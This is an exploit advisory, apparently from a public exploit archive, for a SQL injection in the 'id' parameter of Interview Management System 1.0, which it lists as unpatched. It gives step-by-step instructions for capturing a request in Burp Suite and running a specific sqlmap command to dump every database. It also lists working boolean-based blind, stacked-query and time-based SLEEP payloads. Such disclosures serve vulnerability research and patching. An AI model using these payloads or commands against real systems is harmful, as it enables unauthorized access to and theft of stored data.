Interview Management System 1.0 SQL Injection

`# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection  
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)  
# Date: 2020-12-10  
# Google Dork: N/A  
# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code  
# Affected Version: Version 1  
# Patched Version: Unpatched  
# Category: Web Application  
# Tested on: Parrot OS  
  
Step 1. Login to the application with any verified user credentials  
  
Step 2. Click on View Candidates page and select take exam. If there is no  
candidate, click on "Add New Candidate" page, fill details and add new  
candidate.  
  
Step 3. Click on "Take Exam" and capture the request in burpsuite.  
  
Step 4. Save request and run sqlmap on request file using command " sqlmap  
-r request -p id --time-sec=5 --dbs ".  
  
Step 5. This will inject successfully and you will have an information  
disclosure of all databases contents.  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: Boolean-based blind - Parameter replace (original value)  
Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980  
UNION SELECT 3372) END))  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: id=1;SELECT SLEEP(5)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)  
---  
  
`